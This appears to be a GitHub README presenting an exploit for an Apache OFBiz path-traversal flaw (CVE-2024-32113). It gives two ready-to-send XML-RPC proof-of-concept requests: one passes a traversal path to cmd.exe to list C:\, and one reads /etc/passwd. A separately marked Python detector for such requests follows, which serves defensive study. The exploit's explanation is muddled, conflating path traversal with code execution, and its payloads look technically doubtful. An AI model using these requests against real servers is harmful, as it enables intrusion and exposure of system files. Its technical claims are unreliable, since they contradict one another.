absholi7ly/Apache-OFBiz-Directory-Traversal-exploit
Apache-OFBiz-Directory-Traversal-exploit

A vulnerability classified as critical has been found in Apache OFBiz up to 18.12.12. Affected by this issue is an unknown functionality. The manipulation with an unknown input leads to a path traversal vulnerability. The product uses external input to construct a pathname that is intended to identify a file or directory located underneath a restricted parent directory, but it does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location outside of the restricted directory. Confidentiality, integrity, and availability are impacted.

Introduction

  • The CVE-2024-32113 vulnerability allows for arbitrary code execution on an Apache OFBiz server by sending a specially crafted HTTP request.
  • In this request, the attacker uses the parameter ../../../../../../etc/passwd to point to the /etc/passwd file on the Apache OFBiz server.
  • When the Apache OFBiz server processes this request, it will attempt to read the etc/passwd file, which contains sensitive information about the users on the server.
  • This information can be used to carry out further attacks on the server, such as stealing data, modifying it, or even deleting it.

PoC

1-

POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>performCommand</methodName>
  <params>
    <param>
      <value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
    </param>
  </params>
</methodCall>

OR

2-

POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>example.createBlogPost</methodName>
  <params>
    <param>
      <value><string>../../../../../../etc/passwd</string></value>
    </param>
  </params>
</methodCall>
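As an added example (not part of this repository), a small Python checker that flags XML-RPC requests to the OFBiz /webtools/control/xmlrpc endpoint whose parameter values contain traversal sequences, including percent-encoded and backslash variants; the sample requests and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample requests (method, path, body); not real captured traffic.
SAMPLE_REQUESTS = {
    "benign": ("POST", "/webtools/control/xmlrpc",
               '<?xml version="1.0"?><methodCall><methodName>example.createBlogPost'
               '</methodName><params><param><value><string>hello</string></value>'
               '</param></params></methodCall>'),
    "traversal_plain": ("POST", "/webtools/control/xmlrpc",
               '<methodCall><methodName>example.createBlogPost</methodName><params>'
               '<param><value><string>../../../../../../etc/passwd</string></value>'
               '</param></params></methodCall>'),
    "traversal_encoded": ("POST", "/webtools/control/xmlrpc",
               '<methodCall><methodName>performCommand</methodName><params><param>'
               '<value>..%2f..%2f..%2fwindows\\system32\\cmd.exe?/c+dir+c:\\</value>'
               '</param></params></methodCall>'),
    "other_endpoint": ("GET", "/control/main", ""),
}

# A ".." path component bounded by slashes (or string start/end) after normalization.
TRAVERSAL = re.compile(r"(?:^|/)\.\.(?:/|$)")

# XML-RPC parameter values; <string> is optional because it is the default type.
PARAM_VALUE = re.compile(r"<value>\s*(?:<string>)?(.*?)(?:</string>)?\s*</value>", re.S)


def normalize(value: str) -> str:
    # Decode percent-encoding twice (catches double encoding), then unify separators.
    return unquote(unquote(value)).replace("\\", "/")


def analyze(method: str, path: str, body: str) -> list:
    # Return the raw parameter values that contain a traversal sequence.
    if not path.startswith("/webtools/control/xmlrpc"):
        return []
    return [v for v in PARAM_VALUE.findall(body) if TRAVERSAL.search(normalize(v))]


def scan_requests(requests: dict) -> dict:
    # Map request label -> suspicious parameter values, for requests that have any.
    hits = {label: analyze(*req) for label, req in requests.items()}
    return {label: vals for label, vals in hits.items() if vals}


if __name__ == "__main__":
    for label, vals in scan_requests(SAMPLE_REQUESTS).items():
        print(f"{label}: {vals}")
```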
